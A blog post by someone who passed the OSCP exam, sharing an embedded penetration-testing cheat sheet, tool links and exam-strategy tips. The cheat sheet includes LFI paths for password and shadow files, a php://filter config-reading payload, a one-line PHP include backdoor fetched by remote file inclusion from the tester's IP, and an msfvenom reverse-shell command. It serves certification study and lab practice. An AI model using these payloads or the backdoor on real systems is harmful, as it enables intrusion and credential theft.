Here are some resources and tools I found useful while taking (and passing!) the Pentesting with Kali (PWK) course in preparation for the Offensive Security Certified Professional exam. It has been about two weeks since I passed, and I am still reveling in the satisfaction that has come with it, as it was ultimately a year-long effort to prepare for and take the course in order to pass the exam.

Many people post the usual resources that you can find on various blogs related to the course (g0tmi1k, highoncoffee, pentestmonkey, etc), and those are absolutely useful, but what I have assembled here are less common, and are hopefully useful for those of you about to embark on, or already in, the OSCP journey. They were useful for me.

Enjoy!

How to Pass the OSCP

How to pass the OSCP

Recon
Find vuln
Exploit
Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

TCP

unicornscan -i tap0 -I -mT $IP:a
db_nmap -e tap0 -n -v -Pn -sV -sC --version-light -A -p

UDP

unicornscan -i tap0 -I -mU $IP:a
db_nmap -e tap0 -n -v -Pn -sV -sC --version-light -A -sU -p

Enumerating

This is the essential part of penetration. Find out what is available and how you could punch through it with minimum ease.

DO NOT SKIP STEPS.

DO NOT PASS GO.

SEARCH ALL THE VERSIONS WITH searchsploit (or google -> site:exploit-db.com APP VERSION)

HTTP – 80, 8080, 8000

curl -i ${IP}/robots.txt

Note down Server and other module versions.

searchsploit them ALL.

Visit all URLs from robots.txt.

nikto -host $IP

gobuster -u http://$IP -w /usr/share/seclists/Discovery/Web_Content/Top1000-RobotsDisallowed.txt

gobuster -u http://$IP -w /usr/share/seclists/Discovery/Web_Content/common.txt

if nothing, find more web word lists.

Browse the site but keep an eye on the burp window / source code / cookies etc.

Things to be on look for:

Default credentials for software
SQL-injectable GET/POST params
LFI/RFI through ?page=foo type params
LFI:
- /etc/passwd | /etc/shadow insta-win
- /var/www/html/config.php or similar paths to get SQL etc creds
- ?page=php://filter/convert.base64-encode/resource=../config.php
- ../../../../../boot.ini to find out windows version
RFI:
- Have your PHP/cgi downloader ready
- <?php include $_GET['inc']; ?> simplest backdoor to keep it dynamic without anything messing your output
- Then you can just http://$IP/inc.php?inc=http://$YOURIP/bg.php and have full control with minimal footprint on target machine
- get phpinfo()

HTTPS – 443

Heartbleed / CRIME / Other similar attacks

Read the actual SSL CERT to:

find out potential correct vhost to GET
is the clock skewed
any names that could be usernames for bruteforce/guessing.

FTP – 21

Anonymous login
Enumerate the hell out of the machine!
- OS version
- Other software you can find on the machine (Prog Files, yum.log, /bin)
- password files
- DLLs for msfpescan / BOF targets
Do you have UPLOAD potential?
- Can you trigger execution of uploads?
- Swap binaries?
Vulnerabilities in version / RCE / #WINNING?-D

SMB – 139, 445

enum4linux -a $IP

Read through the report and search for versions of things => searchsploit

smbclient -L $IP

Mount shares

mount -t cifs -o user=USERNAME,sec=ntlm,dir_mode=0077 "//10.10.10.10/My Share" /mnt/cifs

Can you access shares?

Directly exploitable MSxx-xxx versions?
- Worth burning MSF strike?

SNMP – UDP 161

Try to enumerate windows shares / network info

Quick test of communities:

onesixtyone

Full discovery of everything you can:

snmp-check

TFTP – UDP 69

Read / Write access?
- Pretty much same things as FTP

SSH – 22

Unless you get a MOTD or a broken sshd version, you are SOOL and this is likely just a secondary access point once you break something else.

Email – 25, 110/995 or 143/993

SMTP, POP3(s) and IMAP(s) are good for enumerating users.

Also: CHECK VERSIONS and searchsploit

Buffer Overflow

Determine length of overflow trigger w/ binary search “A”x1000
Determine exact EIP with pattern_create.rb & pattern_offset.rb
Determine badchars to make sure all of your payload is getting through
Develop exploit

Is the payload right at ESP
- JMP ESP
Is the payload before ESP
- sub ESP, 200 and then JMP ESP
- or
- call [ESP-200]

msfvenom -a x86 --platform windows/linux -p something/shell/reverse_tcp lhost=x.x.x.x lport=53 -f exe/elf/python/perl/php -o filename

Make sure it fits your payload length above

Gain shell, local priv esc or rooted already?

Misc tools

cewl for crawling a site for bruteforcing user/password
don’t forget about nmap scripts!
- e.g. --script smtp-commands or --script auth-owners

view raw how-to-oscp-final.md hosted with ❤ by GitHub

My favorite part is this, right at the beginning:

1. Recon
2. Find vuln
3. Exploit
4. Document it

However, I would add a step so that it looks more like this:

1. Recon
2. Find vulnerability
3. Exploit
4. Privilege Escalation
5. Document it

Most of the machines in the PWK labs require that additional step. You seldom run across a VM where you run an exploit and get root right away, with no intermediary privilege escalation step needed. In fact, it is an entirely unique skill that you need to develop, practice, and practice again. What’s more, you have to learn “privesc” for both Linux/Unix and Windows machines — two entirely different methodologies.

Path to OSCP

https://localhost.exposed/path-to-oscp/
An interesting ‘trials and tribulations’ story of one man’s path to accomplishing his goal: the OSCP certification. Contains both video logs and various notes and snippets that may be helpful to you.

One Two Punch

https://github.com/superkojiman/onetwopunch
I didn’t discover this script until I had already rooted about 15 of the machines in the PWK labs, but I wish I had learned of it sooner. It runs a unicornscan (UDP) to find open ports, then passes them to nmap for service detection. It also looks at all 65,535 ports, so you don’t miss anything. Set this up as one of the first things you do when you start working on a new machine (it takes a while to run), then come back to check the results after you’ve done some manual exploration.

Reconnoitre

https://github.com/codingo/Reconnoitre
“A reconnaissance tool made for the OSCP labs to automate information gathering and service enumeration whilst creating a directory structure to store results, findings and exploits used for each host, recommended commands to execute and directory structures for storing loot and flags.”

This tool, named CES tools, ended up being a workhorse, both in the labs and in the exam. Being able to check quick nmap results while more in-depth scans were still going was invaluable for getting things rolling along.

General Tips from Techexams

http://www.techexams.net/forums/security-certifications/116262-oscp-starting-13-12-2015-a-6.html#post1028560
This post has a lot of good tips for the OSCP exam. I can’t stress enough the need to be prepared for the exam, having all the things you need at your fingertips so that you don’t have to go digging through notes of files when you are tight on time or limited on brain power because you’ve been working on this for 18 straight hours.

Test Taking Strategy
http://www.hackingtutorials.org/hacking-courses/offensive-security-certified-professional-oscp/

The most useful parts of that site for me were:
Finish your lab report for 5 extra points and optionally the course exercises for an additional 5 points. You might need them to reach the 70 points.
You need to write a penetration test report after the exam. Make sure you know how to write it so you know what information to collect during the exam. The lab report is a great practice for this, use it to learn how to document properly.

There were so many people in the NetSec Focus OSCP Slack channel that skipped the exercises, skipped the videos, and skipped documenting the requisite 10 VMs to get the bonus points for the exam. I saw more than a few of them fail the exam as a result. I would likely have failed the exam had I not completed the exercise and 10 lab machine documentation. All I will say is this:

Do not skip the exercise or lab documentation. These are free points. The way the exam scores total up, you may well need these points to pass!

Timing of the Exam

Also from this page, I chose to follow this exact strategy for timing, and it really worked for me. The important thing to consider is being able to have two fresh starts.

“The second attempt I’ve started the exam at 3 PM and planned to work till 3 AM and then sleep till early morning. This way I had 2 ‘fresh’ starts for the exam to utilize more productive hours.”

I ended up sleeping from 2am to 5am, at which point I set an alarm and a full pot of coffee to carry me through until the exam was over. I also had the support of my amazing wife, who kept me fed and hydrated the whole time.

The Offsec PWK Kali VM

Use the provided Kali VM, do not use the latest/greatest Kali version. Offset provides you with a VM that has been customized to contain everything you need to complete the course and the exam. There is no need to update it. There is no need to run the latest version of Kali. In fact, they customize it in certain ways to make sure you don’t run into problems, so don’t try to use something different. I witnessed multiple people having problems with this in the NetSec Focus OSCP Slack channel, and I wisely used the Offset Kali VM the whole course to avoid issues.

The NetSec Focus Slack Channel

I have mentioned it a few times, but this Slack channel was invaluable during my OSCP journey. It allowed me to ask questions, bounce ideas off others, and chat with folks who were currently in the course or had already passed it. If you are in the OSCP course and you join the group, ask a moderator to add you to that private OSCP channel once you join. Keep in mind that they do not allow spoilers, or even questions about specific lab machines. This resource is a great asset for those taking the PWK/OSCP course, and I made some good friends from being there and suffering through it all.

Lastly, I have to say it:

Try harder!

OSCP and PWK Tips, Resources & Tools